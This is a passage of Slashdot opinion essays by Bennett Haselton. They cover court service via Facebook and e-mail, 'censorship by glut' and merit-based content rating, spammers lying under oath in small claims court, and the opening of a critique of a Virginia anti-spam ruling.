    As to the first question — the court's endorsement of service via Facebook does not mean that they think the service is necessarily secure or reliable. Courts often let you serve papers on a party in a court case via means that are less reliable than normal channels, provided that you've exhausted the more reliable means first. When I was trying to earn my way into heaven by suing spammers in Small Claims court, some states allowed corporations to be served by serving the papers on the Secretary of State in the corporation's home state, but only if you could prove that you had tried and failed to serve the corporation at their registered address. In cases where I served the Secretary of State, it's unlikely that the defendant ever even saw the papers (since the only thing the Secretary of State could do with them was forward them to the defendants' address on file, where I'd already tried to locate them), but it still "counted" because I had exhausted the regular means of serving the documents. Sometimes when serving an individual, if the sheriff couldn't reach someone at home, a judge would sign an order allowing the legal papers to be stuck to their front door (which is neither "secure" nor "reliable"), but only after the sheriff had been unable to deliver it to them in person. So a court's endorsement of Facebook as a means of service doesn't necessarily mean the court thinks that the means of service is reliable. It just means it's a good last resort when conventional methods haven't worked.

    Facebook is not, after all, secure or reliable, although these limitations are not the fault of Facebook itself. By "not reliable," I don't mean that it loses or mis-routes messages — I've never seen that happen — but that you have no idea whether someone has signed in to read a message, or deleted it by accident, or lost it among all the other messages that they received. As for whether it's "secure," like most services, the greatest weakness in Facebook's security is in the 'forgot your password' feature — if you compromise someone's e-mail account, then you can have a password reset link sent to their e-mail address and compromise their Facebook account as well. So your Facebook account is only as secure as your e-mail account, and e-mail accounts are usually vulnerable in their own "forgot your password" feature, which often lets you access someone's e-mail account just by knowing their birth date, their zip code, and the answer to an easy question like "Who is your favorite fictional character?" And in any case, obtaining "service" via Facebook doesn't preclude the possibility that the person you served on Facebook was an impostor, or another person who happened to have the same name.

    What would really change the game would be if courts started ruling that service via Facebook was valid even without first attempting to serve a party via mail or other means. I had my own experience with a case like this in 2000, when programmers Matthew Skala and Eddy Jansson released a program called "CPHack" which could decode the encrypted list of sites blocked by a program called Cyber Patrol, so that people who owned copies of the program could use CPHack to decrypt the list of blocked sites. (One of the more controversial aspects of such blocking software is that the list of blocked sites is hidden from purchasers of the program.) A judge granted Cyber Patrol a ruling forbidding the authors from distributing the program, and ordering anyone hosting a mirror copy of the program to remove it as well. That same day, I received a copy of the ruling via e-mail from Cyber Patrol's lawyer, ordering us to remove the mirror from the Peacefire site. I asked a lawyer if that was considered valid service (this was back when I still thought that a legal question like that always had an objective answer, as opposed to the question of "valid service" being an entirely subjective one that depended on what judge you happened to get), and he said that I shouldn't take any chances and should take the mirror down anyway, which we did. Dozens of other mirror sites, which had sprung up in anticipation of the legal controversy, were also served with papers, although the overseas ones mostly ignored them.

    So this was very different from a ruling made by the 9th Circuit Court of Appeals two years later, allowing a Las Vegas casino to serve an offshore company via e-mail because regular methods had failed. The court in that case wrote, "When faced with an international e-business scofflaw playing hide-and-seek with the federal court, e-mail may be the only means of effecting service of process." But I was a domestic scofflaw whose mailing address was publicly known (in the WHOIS registration for the Peacefire site). What was the rationale for allowing me to be served by e-mail?

    Unfortunately I think it's probably just a case where the rules were vague enough that the judge felt entitled to bend them to achieve an outcome that he wanted. The 9th Circuit didn't leave much doubt as to the level of objectivity in their ruling on e-mail service either, in calling the defendant an "international e-business scofflaw."

    And these are the two main reasons why I think that allowing electronic "insta-service" via e-mail or Facebook — in cases where parties have not first tried to serve papers via regular means — would erode the rights of the little guy. First, in most of the cases I can think of where a powerful plaintiff was playing "whack-a-mole" with multiple defendants by using electronic service of process to shut down new sites as fast as they were springing up, the goal they were trying to achieve was (a) futile, if half the mirror sites were overseas anyway, and (b) ultimately incompatible with civil liberties. (Why shouldn't people have the right to decrypt the list of sites blocked by Cyber Patrol? After the ACLU got involved on appeal, a higher court ultimately ruled that mirror sites could not be ordered to take down CPHack. The HD DVD encryption key controversy is another well-known example.) In cases where a plaintiff has a legitimate claim against multiple sites — for example, sites that are violating the plaintiff's copyright by hosting unauthorized copies of content that they own — most service providers already publish an e-mail address where copyright owners can send a DMCA takedown notice, and where the copyright owner is risking large statutory financial penalties if they send a takedown notice that turns out to be baseless. There are no similar protections to prevent abuses of the system through electronic service of other kinds of legal notices.

    The other reason this trend could work against the average person, is that any vague rule that is not consistently followed by different judges, puts non-lawyers at a disadvantage in court. Partly because it may confuse non-lawyers who hear that e-mail service was allowed in one case, and think that's part of "the rules," and then find that e-mail service was disallowed in another case, and wonder how "the rules" could allow it in one case but not in another, all the while laboring under the mistaken impression that there actually are "rules" which unambiguously determine whether or not e-mail service is allowed, when the truth is that it's just up to each individual judge. But also because every ambiguity in the rules is another opportunity for the judge's prejudices to influence the outcome. I do not think that most judges are prejudiced against people based on race or gender, but I doubt you could find any legal professional who thinks that most judges would take a case equally seriously regardless of whether it was brought by a professional lawyer or by a layperson representing themselves. (At one point in my spammer-suing career, I had only about a 50-50 chance of my motions even being read.)

    So, let's not get carried away applauding judges for being "hip" and "with it" for allowing service via e-mail or Facebook. And if they start allowing it more frequently, can we at least ask that they pick one rule and stick with it?

  38. Censorship By Glut

    Features · · posted by ScuttleMonkey · from the all-my-ideas-are-brilliant dept. · 391 comments
    Frequent Slashdot contributor Bennett Haselton writes "A 2006 paper by Matthew Salganik, Peter Dodds and Duncan Watts, about the patterns that users follow in choosing and recommending songs to each other on a music download site, may be the key to understanding the most effective form of "censorship" that still exists in mostly-free countries like the US It also explains why your great ideas haven't made you famous, while lower-wattage bulbs always seem to find a platform to spout off their ideas (and you can keep your smart remarks to yourself)." Read on for the rest of Bennett's take on why the effects of peer ratings on a music download site go a long way towards explaining how good ideas can effectively be "censored" even in a country with no formal political censorship.

    In a country where you're free to say almost anything in the political arena, I think the only real censorship of good ideas is what you could call "censorship by glut". If you had a brilliant, absolutely airtight argument that we should do something -- indict President Bush (or Barack Obama), or send foreign investment to Chechnya, or let kids vote -- but you weren't an established writer or well-known blogger, how much of a chance do you think your argument would have against the glut of Web rants and other pieces of writing out there? Especially if your argument required people to read it and think about it for at least an hour? Perhaps your situation could be compared to that of a brilliantly talented band submitting a song for Matthew Salganik's experiment.

    What Salganik and his co-authors did was recruit users through advertisements on Bolt.com (skewing toward a teen demographic) to sign up for a free music download site. Users would be able to listen to full-length songs and then decide whether or not to download the song for free. Some users were randomly divided into eight artificial "worlds" in which, while a user was listening to a song, they could see the number of times that the song had been downloaded by other users in the same world -- but only by other users within their own world, not counting the downloads by users in other worlds. The test was to see whether certain songs could become popular in some worlds while languishing in others, despite the fact that all groups consisted of randomly assigned populations that all had equal access to the same songs. The experiment also attempted to measure the "merit" of individual songs by assigning some users to an "independent" group, where they could listen to songs and choose whether to download them, but without seeing the number of times the song had been downloaded by anyone else; the merit of the song was defined as the number of times that users in the independent group decided to download the song after listening to it. Experimenters looked at whether the merit of the song had any effect on the popularity levels it achieved in the eight other "worlds".

    The authors summed it up: "In general, the 'best' songs never do very badly, and the 'worst' songs never do extremely well, but almost any other result is possible." They also noted that in the "social influence" worlds where users could see each others' downloads, increasing download numbers had a snowball effect that widened the difference between the successful songs and the unsuccessful: "We found that all eight social influence worlds exhibit greater inequality -- meaning popular songs are more popular and unpopular songs are less popular -- than the world in which individuals make decisions independently." Figures 3(A) and 3(C) in the paper show that the relationship between a song's merit and its success in any given world -- while not completely random -- is tenuous. And if you're a talented musician and you want to get really depressed about your prospects of hitting the big time, Figures 3(B) and 3(D) show the relationship between a song's measured merit and its actual number of sales in the real world. (Although those graphs may cheer you up if you're a struggling musician who hasn't made it big yet -- maybe it's not you, it's just the roll of the dice.)

    As the Richard Thaler and Cass Sunstein put it in their all-around fascinating book Nudge , where I first read about the Salganik study:

    In many domains people are tempted to think, after the fact, that an outcome was entirely predictable, and that the success of a musician, an actor, an author, or a politician was inevitable in light of his or her skills and characteristics. Beware of that temptation. Small interventions and even coincidences, at a key stage, can produce large variations in the outcome. Today's hot singer is probably indistinguishable from dozens and even hundreds of equally talented performers whose names you've never heard. We can go further. Most of today's governors are hard to distinguish from dozens or even hundreds of politicians whose candidacies badly fizzled.

    Is the blogosphere, or the "marketplace of ideas" in general, any different? If a random sample of bloggers were rated based on some independent measure of merit -- for example, independent ratings from a random sampling of blog readers, who were looking at the bloggers' writing samples for the first time, analogous to users in Salganik's "independent" world -- and then correlate that with the bloggers' traffic or some other measure of success, it's not hard to imagine the results would be similar to those of the 8-worlds experiment: the best often rise to the top, the very worst rarely do, but success in the vast middle would be close to random. In fact, while music listeners would have no logical reason to like a song just because others did, users in the blogosphere and other public forums would have several rational reasons to cluster around writers who are already popular: (1) errors are more likely to have been spotted and pointed out by someone else; (2) as an extension of that, others are more likely to have provided comments and other value-added content; (3) if you are the first person to spot an error, it's more important on a popular blog to point out the error and stop the misinformation from spreading, than on a minor blog that nobody has ever heard of. So the "snowball effect" of popularity in the blogosphere would be even more pronounced.

    Then why do so many people believe in what Thaler and Sunstein call the "inevitability" of success based on merit, in domains like music, politics, and writing? I think it's because the belief is what scientists call an unfalsifiable one -- if the "best" acts are assumed to be the ones that end up on the top of the pile, then the marketplace has always sorted the "best" content to the top, by definition. Since the definition is circular, the premise could never be disproved by any amount of counter-evidence -- even if an act that used to be popular, suddenly falls under the radar, that could be seen as "proof" that they lost whatever magic touch they used to have, not as evidence of the arbitrariness of the market! The only disproof would be an artificial experiment like Salganik's, showing that once you get beyond a certain threshold of quality, commercial success has little relationship to independently measured merit -- but such experiments, which in Salganik's case required the cooperation of over 14,000 users, don't come along very often. And as long as most people don't realize how arbitrary the existing marketplaces are, there isn't enough demand to justify building a system that could work better -- indeed, to even justify asking the question of whether a system could be designed that would work better.

    And that, I think, is how "censorship by glut" really works. It's not just the sheer amount of written content that censors small voices -- if you happen to know about a particular writer that you consider a fount of wisdom, then the existence of a billion other Web pages won't stop you from reading that writer's content. And it's not as if there aren't plenty of people who realize that success can be highly arbitrary. The problem is that as long as most people assume that the existing marketplace of ideas does a good job of sorting the best content to the top, then they'll be more inclined to stay with the most popular news sites and blogs, and even the minority who know that it's largely a lottery, will have no effective way of finding the best content among everything else, so they'll end up sticking with the most popular sites as well. Worse, as a secondary effect, most people with something useful to contribute won't even bother, if they don't already have a large built-in audience. I know plenty of people who could write insightful essays about social and technological issues, essays that would give most readers a new perspective such that they would definitely say afterwards: "That was worth my time to read it." But it wouldn't be worth it to the writers, because they know that their content isn't going to get magically sorted into its deserved place in the hierarchy.

    (My own favorite blog that nobody's ever heard of is Seth Finkelstein's InfoThought, which is usually logical and insightful and is only about 25% of the time about how "nobody ever reads this blog, so what's the point". His Guardian columns are also good and usually don't have that subtext, perhaps because it's considered impolite to use a newspaper's column-inches (column-centimeters?) to complain that you have no voice.)

    So can this problem be avoided, or is inequality and arbitrariness just a permanent part of the marketplace for content and ideas? You could create an artificial world that would sort user-submitted content according to some other algorithm -- and even if it didn't give good writers the fame that they theoretically deserved in the larger world, it might still provide them with enough of an audience within the artificial universe, to make it worth their time to keep writing. One option would be to use Salganik's "independence" world model, where users would read content without being able to see the ratings that other people had given to it, or without even seeing recommendations from similarly-minded friends within the system. The trouble is that without any information about what other readers liked, without any starting point to sort good content from bad content, it may not be worth the reader's time to read through all the dreck to find the occasional buried treasure. I believe about as strongly as a person can believe, that the existing marketplace for content is far from meritocratic, for example that there are probably thousands of songs on iTunes that I've never heard of but would nonetheless love -- but even I don't spend time listening to the 30-second clips of random songs on iTunes, because it takes too long to find the stuff I would like.

    But I submit there is a solution -- a variant of an argument that I've suggested for stopping cheating on Digg, or building Wikia search into a meritocratic search engine, or helping the best writers rise to the top on Google Knol. The solution is sorting based on ratings from a random sample of users. The remainder of this speculation will be very theoretical, and will at times seem like a Rube-Goldberg approach to what should be a simple problem. But at each juncture, the complications to the algorithm are motivated by an argument that anything simpler would not work. At many points along the way, it will be tempting to throw up one's hands and say, "Why go to all this trouble, the existing system works well enough." But this statement is hard to quantify with any actual evidence -- unless you're just using the circular definition above, that whatever rises to the top is automatically the "best".

    For music listeners, the gist of the algorithm is: When an artist submits a new song in the alt-rock category for example, the song is distributed to a random sample of 20 users who have indicated an interest in that genre. If the average rating from those users is high enough, the song gets recommended to all of the site's users who are interested in alt-rock. If the average rating is not high enough, then the artist receives a notification, perhaps with a list of comments from the listeners suggesting what to improve. As long as the initial random sample of users is large enough that the average rating is indicative of what the rest of the site's alt-rock fans would think, the good content will get to be enjoyed by all of the site's alt-rock customers, while the bad content would fizzle after only wasting the time of 20 people. If it turns out that a random selection of 20 users are typically too lazy to rate the songs that are submitted to them, you could even make artists submit $10 to have their songs rated by the focus group, and pay each of the 20 raters $0.50 each for their trouble. Artists can't withhold payment as revenge for a bad rating, so the average ratings should still be proportional to the song's actual quality.

    At this point, you might object that this system suffers from the same unfalsifiable, circular reasoning as the belief that the marketplace rewards the "best" content, if the best content is the content that wins in the marketplace. If I define the "best" content to be the content that gets the highest average score in a random focus group, then of course this algorithm sorts the best content to the top, because that's how "best" was defined! But this system does actually have a non-trivial property: If you implement the system in multiple separate "worlds" (similar to those that Salganik created), then provided your focus groups are large enough to provide representative random samples, the same content should rise to the top in each of the worlds, unlike the results in Salganik's experiment.

    This actually wouldn't be the case if the initial focus groups were not big enough -- then random variations in a few voters' opinions could cause many songs to succeed in one world and fail in another. So it's a non-trivial property that is not automatically true, and would not be true if you made an error in designing the system, like making the focus groups too small. But the larger the size of the random sample, the smaller the variance in the expected value of the average of their ratings, and the greater agreement you would expect between the results from different worlds.

    As Salganik pointed out to me, this system does under-reward songs that might require repeated listenings over time to gain an appreciation of their qualities. But even this, strictly speaking, can be modeled in exchange for cash -- I'll pay 20 users $2 each if they listen to my song once today, once in three days, and once again a week after that (the site could stream the song to them to provide at least some likelihood that the users weren't cheating). This assumes some things, such as that repeated exposure has the same growing-on-you effect even if the exposure is forced -- but in the real world, songs often grow on you from repeated listenings that are "forced" anyway, if they're played in the doctor's office or on the radio when you don't bother to change the channel. And this might be more complicated than necessary -- often when a song grows on you, it at least interests you enough the first time you hear it, that you'd give it a positive rating on the first listen, which is all that the site requires for the song's success.

    However, if you try to adapt this trick to a meritocracy for written content, you run into different problems. With a song, if you poll a random sample of users, the odds are very small that anyone being polled will be a vested interest in the success of the song, like one of the band members or one of the song's producers (assuming the population of users is large enough, and the song's producers have not been able to create a huge number of "sockpuppet" accounts to manipulate the voting). So you can assume the ratings will be free of any prior bias. But with a political post, for example, if you write a pro-Bush or anti-Bush essay, it's quite likely that among a random sample of users, there will be people who are biased to vote up (or vote down) any post that has anything good to say about the President. The essays voted to the top may not be the best-written ones, but simply the ones that pander to the most popularly held opinions.

    But if the "best" essays are not the ones that receive the highest percentage of positive votes, even when polling a random sample of independent users -- which I was advocating as the gold standard for measuring merit -- then how do you define what makes the "best" essays, anyway? There are many possible answers, but I suggest: A necessary condition for being among the "best" essays would be to convince the most people of something that they didn't believe before, without resorting to tricks such as blatantly fabricating statistics or attributing made-up quotes. This is not a sufficient condition for merit -- maybe the point of view that you're convincing people of, is still wrong -- but I submit that if you're not at least changing some people's minds, then there's no point. An essay that changes a lot of people's minds in a random focus group, is usually worth reading, if only to see why it has that effect.

    Unfortunately, this doesn't suggest a better way to poll users about the merit of an essay, because if you ask users, "Were you a Bush supporter before reading this essay?" and "Were you a Bush supporter afterwards?", Bush supporters are eventually going to figure out that the way to give the essay a high score on the mind-changing scale, would be to (falsely) say that they were not a Bush supporter before reading the essay, but they were one afterwards. So you'd still end up rewarding the essays that reinforce pre-existing opinions instead of the ones that change people's minds.

    From here the counter-measures and counter-counter-measures get increasingly complicated. For each category of essays that a user wants to rate, such as Bush opinion pieces, you could require new users to enter their current opinion: either pro-Bush or anti-Bush. Then if they were asked to rate a pro-Bush essay, they would only be able to vote that the essay "changed their minds" by switching their registered opinion from "anti-Bush" to "pro-Bush". But Bush supporters could sign up initially as anti-Bush, just in the hopes of being part of a random focus group so they could cast their mind-changing vote for a Bush essay by changing their registration to "pro-Bush"! However, each user would only be able to do that once -- or do you allow users, after they've switched from anti-Bush to pro-Bush, to "reload" by spontaneously switching back to anti-Bush for no reason at all, so they're all set to cast a mind-changing vote for the next pro-Bush essay? Or would they only be allowed to switch back to anti-Bush, by casting a mind-changing vote as part of a random focus group for an anti-Bush essay -- thus giving a boost to an anti-Bush screed, as part of the price they pay for the next vote they cast for a pro-Bush piece? Then users could still game the system, by switching to "anti-Bush" when casting a vote for a very poorly written anti-Bush essay that they don't think anybody else will vote for anyway, and then switching back to "pro-Bush" only for the good essays that have a shot, hoping that their votes will coalesce around the decently-written pro-Bush essays and push them to the front page...

    Am I over-thinking this? I submit this is an area where there's been too much under-thinking. Haven't we all been tempted to believe that the marketplace of ideas -- not to mention bands, blog posts, and business ventures -- efficiently sorts content to the place in the hierarchy of rewards that it deserves, without having any real evidence for this, except the circular definition of "quality" as being proportional to success? And the more people believe this, the more that marginalized voices will effectively be censored, even when they have something brilliant to contribute. We should at least think about ways that we could do better. Or else, prove logically that it can't be done (a logical proof can only approximate the real world, but it could show that such a pure meritocracy would be very improbable, or wouldn't work well). However I think the ideas above make it seem unlikely that a meritocracy is logically impossible. Maybe they're a step in the right direction. Maybe someone else's ideas would be better. The important thing is that a meritocratic algorithm be judged by something other than a circular definition, which simply decrees by fiat that the winning content is the best.

  39. Spammer Perjury is Worth Prosecuting

    Features · · posted by CmdrTaco · from the love-a-little-alliteration dept. · 161 comments
    Slashdot regular Bennett Haselton summarizes his essay by saying "Spammers really do lie more often under oath than other parties in court (surprise). Judges and prosecutors could promote respect for the law by cracking down on it, and maybe make a dent in spam in the process." Read on to learn of his experiences with (shocking!) spammers who lie in court.

    I'm sure everyone feels like their opponents in court are the most reprehensible liars that ever walked the face of the Earth. But these instances seem unusually clear-cut even for a courtroom:

    • When I sued one Ohio company for sending me spam, they sent a letter to me (and, when that didn't work, to the court) claiming that someone had dropped a business card in their box at a trade show with an e-mail address one letter different from mine, and they must have mis-read the address when typing it in. They didn't know that after I first got their spam, I called them pretending to be an interested customer, and tape-recorded a conversation with their advertising manager, pretending to be impressed and asking him how he did it (I was in Arizona, so it was legal to tape the call). He admitted that he used a program to scrape e-mail addresses from Web pages into a list and spam them from his desktop.

    • A spammer who lived in Washington appeared in court and claimed that he had never sent the spam in question and wouldn't know how. I then produced a tape recording of another conversation in which I had talked to him on the phone, again pretending to be an interested customer, and he talked about sending the mails from a server in China to make it harder for people in the U.S. to block them.

    • One company called "Lions Pride Enterprises" actually sent a representative from out of state to tell the judge, "I can tell you, under penalty of perjury, that we looked up the address bhas (at) speakeasy.net in our records, and verified that he had signed up for our list via confirmed-opt-in" (this was right after he explained to the judge, more or less accurately, what confirmed-opt-in meant). Except the mail hadn't been sent to bhas (at) speakeasy.net, the headers showed it was sent to bennett (at) peacefire.org and then forwarded to bhas (at) speakeasy.net. Presumably the spammer just looked at the first address they could find in the headers and assumed that's the one they had mailed, and claimed that address had "opted in." (Much later, this same company apparently branched out into infecting people with spyware.)

    • A spammer from Michigan called in to the court hearing by phone, to defend against charges that he'd sent me a spam advertising credit card processing services, and claimed, "I don't even sell merchant accounts." (He lost, due to inconsistencies in his story -- the judge in that case was unusually tech-savvy.) A few weeks later, the same guy sent me another merchant account spam, so I sued him again, and this time he called in to the court hearing (with a different judge) and admitted that he'd sent the spam, but claimed it was legal. I tried to challenge his credibility on the grounds that he'd testified under oath earlier that he "didn't even sell merchant accounts," but the judge said I wasn't allowed to bring that up.

    Meanwhile, I've sat through dozens of other people's Small Claims cases, and I've never seen anyone in a non-spammer case get caught really, brazenly lying under oath. Of course, it always seems more egregious when it's your opponent -- but I probably would have noticed if someone had gotten tripped up by a physical document or a recording of their own voice.

    The traditional cost-benefit analysis of prosecuting people who lie under oath in a civil trial is that it's just not worth it. The King County Prosecutor's office responded to my inquiry to say they could not recall any instances of someone prosecuted for perjury committed in a civil case. It is not true, by the way, that civil perjury is never prosecuted — when this assumption was making the rounds in 1998 during the Clinton perjury controversy, Professor Stephen Gillers of NYU published a list of counterexamples -- but he conceded in an e-mail that it's nevertheless highly unlikely. Perhaps this makes sense for most trials, where parties come from a general population that includes some honest people and some dishonest people, and even dishonest people often just bend the truth to a degree that outright lying would be hard to prove. (Although I still think it's possible that the costs of prosecuting people who lie under oath in civil cases, might still be outweighed by the benefits of having everyone be scared into being a little more truthful in court proceedings.)

    But spammers are different. In the U.S., all spammers are liars — either they are lying to their hosting provider about what they're doing, or, if they have a secret agreement with their provider to avoid getting kicked off, they are complicit in their provider lying to the rest of the world by claiming that they don't allow spam to emanate from their network. (I'm assuming that 100% of U.S. providers at least claim not to allow the sending of spam. This may not be true of the entire world.) Those lies in themselves can't always be punished in court — I can't sue a spammer for lying to their service provider — but I think that courts just haven't realized that all spammers are liars to some degree, and they're more likely than average to lie under oath. This may make the cost-benefit analysis different in the case of prosecuting spammers who get caught lying. You wouldn't need a "spammer perjury law"; there are already laws against perjury, if judges wanted to enforce them.

    Courts could start with deterrents that don't cost anything. All judges start out their Small Claims hearings by laying out the rules. Some of them include some very stern admonitions about parties not interrupting each other or the judge (one judge, who possibly had a bad morning, started the afternoon session by threatening to have anyone thrown in jail who argued with him). But I've never seen a judge say anything about being strictly required to tell the truth under oath, with penalties for lying that theoretically include jail time. And if someone does get caught lying, the judge could reprimand them as strongly as possible and stop just short of recommending a criminal prosecution. "Oh, wow," you're laughing, "a stern reprimand! That'll teach them!" But that's what judges do to people who interrupt the judge or each other, and it does get people's attention.

    In the examples above, what was surprising was not that the spammers lied to the court but that the judges seemed so blasé about it. In the first case, I had gotten spammed by an Ohio company called SAY Security. After I filed the Small Claims suit and served the papers on them in the mail along with a copy of the spam, I got an e-mail from the owner, Jason Szuch, claiming that they had received a business card at a trade show with 'bnas (at) speakeasy.net' handwritten on it, and accidentally replaced the 'n' with an 'h', and that's how I had gotten their mail. They later made the same claim in a letter to the judge. At the trial, SAY Security didn't show up, so I first pointed out that the e-mail had been sent to bennett (at) peacefire.org and automatically forwarded to bhas (at) speakeasy.net, so it was another case of the spammer mis-reading what address it was sent to, and coming up with a story after the fact. I also had a recording of a conversation with SAY Security's advertising manager, in which he explained how he used a program called Email Extractor to scrape e-mails from Web pages and send the ads.

    At that point, the judge thought he had me: You're not allowed to record phone calls in Washington without the consent of all parties. I told him that I knew this, which is why I had made the call and recorded it while I was visiting my Mom in Arizona, which has no such law (and neither does Ohio, which was where the other party was — in order to secretly tape a phone call, it has to be legal in both the caller's state and the call recipient's state). The judge still said I couldn't use it as evidence in Washington. This raises an interesting question. My understanding is that the rules of evidence in Washington don't say "You can't use a secretly taped phone call as evidence." They say, on the one hand, "You can't secretly tape a phone call in Washington," and on the other hand, "You cannot use evidence that was obtained illegally" — but if the call was taped in Arizona and then brought to Washington, it wasn't obtained illegally. I compared it to winning money by gambling in Vegas and then bringing it to Washington to pay the Small claims filing fee — what difference does it make that gambling is illegal in Washington? Oh well, different judges probably would have come to different conclusions on that.

    But the real point is that even if the judge did think the recording was inadmissible, couldn't he have still said something like, "Well, if the court did admit this evidence, and if these defendants were here, then they could very well be arrested for perjury — if they were here, I'd tell them that they just had a really close call." At least for the benefit of everyone else who was in the courtroom, waiting for their case to be heard — send a message that the court does care if you get caught lying. As it was, he just shrugged it off, and I got a default judgment since SAY Security didn't show up.

    The second case was against a spammer named Joe Spies, who did live in Washington, and who came to court claiming that he didn't know how to send spam and had never made anyone an offer to send spam for money. Again, I had a recording of a phone call in which I pretended to be an interested customer, and he said he could send "5 million e-mails for $500" from a server in China. (This time, since both parties were in Washington, I used a phone number I had specially set up so that people who called it would hear a disclaimer saying "Your call may be monitored or recorded," before it forwarded to my home phone.) Judge Karlie Jorgensen said that even with that phone call, there was not enough evidence that the defendant had sent the e-mail. (This was also the case that I wrote about when I filed a motion with the middle two pages stuck together in the center, and after the motion was denied, I went to the courthouse and saw that the pages were still attached, so I knew that she hadn't read it.)

    Lions Pride Enterprises was the other company who sent a representative claiming that they had sent the mail to bhas (at) speakeasy.net and saying, "I swear under penalty of perjury [he was already sworn in, but repeated it presumably for dramatic effect] that I checked personally, and the address bhas (at) speakeasy.net subscribed to our list via verified opt-in," even though the mail had actually been sent to bennett (at) peacefire.org. This was my first spam case, so at the hearing I stuck to my script and I didn't think to point this out to the judge. But if the courts took a harsher view of defendants lying under oath, maybe it would have been worth the time to write a letter to the judge later after I realized the defendant had lied. (In theory, you can be prosecuted for lying under oath even if it's not discovered until after the original trial is over -- since "in theory" is the only place where spammers are punished for lying under oath anyway.)

    Finally, in May 2008, a spammer in Michigan named John Tucker called in to a court hearing in which I'd sued him for sending me more spam advertising merchant accounts, as well as the company, Pivotal Payments, on whose behalf he was sending the spam. Tucker admitted that he had sent the spam but claimed that Pivotal Payments had nothing to do with it, at which point I attempted to discredit him by bringing up what he'd said at the last trial:

    Me: I wanted to address something that Mr. Tucker said. He sent the faxes saying that he sent this e-mail but he doesn't think it's a violation. But he has stated under oath, to the court, at one point: "I don't even sell merchant accounts." Now I want to introduce that statement because there's a specific rule in the Rules of Evidence, ER 801, which says--
    Judge Eiler: Well, don't quote the Rules of Evidence at me. The Rules of Evidence do not necessarily apply in Small Claims Court. If I were to apply the Rules of Evidence, we would have hearings that lasted about 25 seconds. So, don't quote to the rules of Evidence. If you think there's something that you want to tell me, tell it to me straight out.
    Me: All right. I want to challenge the credibility of John Tucker as a witness, because he has in the past said under oath in court, "I don't even sell merchant accounts."
    Judge Eiler: Did he do it in this court?
    Me: Yes.
    Judge Eiler: Did he do it today?
    Me: No. It was under oath.
    Judge Eiler: Well, while you may tell me it's under oath, it wasn't in front of me, I'm not going to hear it. Move on.
    Me: Well--
    Judge Eiler: Move on.
    Me: Do you want the audio?
    Judge Eiler: Do you want to move on?

    Now there's an odd statement -- "If I were to apply the Rules of Evidence, we would have hearings that lasted about 25 seconds." In Small Claims, the Rules of Evidence are sometimes relaxed in the other direction -- evidence that would be excluded from a regular trial is sometimes allowed to be presented -- but what's the point of making Small Claims more restrictive, excluding evidence that is explicitly allowed under the rules?

    Largely on the basis of John Tucker's testimony absolving Pivotal Payments, and their claims that they refused to pay him once they found out he was spamming, I didn't get a judgment against them (I did get another judgment against John Tucker, although I doubt that he has any assets). Later John told me on the phone that Pivotal Payments did pay him the money they owed him after the trial, in accordance with their agreement with him that he would get paid once they were dismissed from the lawsuit. If that's the case, then they lied under oath, too.

    This was the same Judge Eiler who, in an earlier case, said that an e-mail "didn't quite have the earmarks" of "spam" sent in bulk, when the e-mail said "I run the web site Work At Home Business Opportunities [...] Please post a link to my site as follows...". The Commission on Judicial Conduct formally reprimanded her in 2005 for being rude to plaintiffs representing themselves; she is currently facing charges for the second time for the same issues, including "preventing pro se litigants [i.e. people representing themselves] from fully presenting their testimony or their positions in court." The CJC receives hundreds of complaints every year about rude and inappropriate behavior by judges, and rejects 97% of the complaints. For a judge to get on their radar even once is an achievement; to do it twice probably warrants a steroids test.

    But with regard to laxity towards spammers lying under oath, she is indeed no worse than any other judge. Although Professor Gillers's article showed it's not true that no one is ever prosecuted for civil perjury, it's no wonder that people think that's the case, based on the rarity of prosecutions, combined with the outcomes of the two famous cases that people have heard about. Bill Clinton was disbarred from practicing law before the Supreme Court and had his Arkansas law license suspended for five years, but was never prosecuted; Kwame Kilpatrick was heavily criticized for lying under oath, but only went to jail for violating the terms of his bond. The defenders of both men had a point that even if they lied under oath in a civil case, hardly anyone else ever got punished for that.

    In fact, I don't think all perjurers should be prosecuted — Clinton and Kilpatrick were lying to cover up extra-marital affairs, after all. When Clinton was asked during Paula Jones's sexual-harassment lawsuit whether he had ever had a sexual relationship with any other subordinate, if he had answered "Yes" out of the blue and voluntarily spilled out all the lurid details about Monica Lewinsky, wouldn't you have thought, "Dude, you could have just said, 'No'"? They probably shouldn't have gone to jail for perjury. But the mud-slinging they endured, as partisan as it was, at least reminded everyone that a rule had been broken.

    The judicial branch can instruct judges at all levels to take perjury in civil cases seriously — at the very least, judges should act angry when someone gets caught lying under oath, at least as angrily as they act when someone interrupts them. That promotes respect for the rule of law, and it doesn't cost anything. And if some parasite like a spammer gets caught lying, prosecutors may be doing the world a favor by pressing criminal charges against them.

    In other words, I agree with Thomas Sowell, who responded to defenders of Bill Clinton who said that "everybody" lies about sex: "Everybody urinates every day, but if you do it in a court of law, you will be arrested. And then you will be tried by a jury of your PEERS." OK, I made the last part up.

  40. Virginia High Court Wrong About IP Addresses

    Features · · posted by CmdrTaco · from the i-was-wrong-about-milli-vanilli dept. · 174 comments
    Frequent Slashdot contributor Bennett Haselton writes "The Virginia Supreme Court has ruled that the state's anti-spam law, which prohibits the sending of bulk e-mail using falsified or forged headers, violates the First Amendment because it also applies to non-commercial political or religious speech. I agree that an anti-spam law should not outlaw anonymous non-commercial speech. But the decision contains statements about IP addresses, domain names, and anonymity that are rather basically wrong, and which may enable the state to win on appeal. The two basic errors are: concluding that anonymous speech on the Internet requires forged headers or other falsified information (and therefore that a ban on forged headers is an unconstitutional ban on anonymous speech), and assuming that use of forged headers actually does conceal the IP address that the message was sent from, which it does not." Click that magical little link below to read the rest of his story.
    The first 20 pages of the decision, which are all about legal standing, jurisdiction, and overbreadth, made my eyes glaze over. I'm not analyzing those at all except to point out that on most of those issues, the lower court came to exactly the opposite conclusion from that of the Virginia Supreme Court, and there is no reason to think that the higher court is any more likely to be "correct" than the lower court (even granting the assumption that there is an objectively "correct" answer to these questions). Any time you feel intimidated by "experts," it's helpful to step back and ask whether the alleged experts even agree with each other.

    Page 21 is where the technical stuff starts that we can tear apart directly. The decision says, in talking about the transmission of e-mail:

    The IP address and domain name do not directly identify the sender, but if the IP address or domain name is acquired from a registering organization, a database search of the address or domain name can eventually lead to the contact information on file with the registration organizations. A sender's IP address or domain name which is not registered will not prevent the transmission of the e-mail; however, the identity of the sender may not be discoverable through a database search and use of registration contact information.

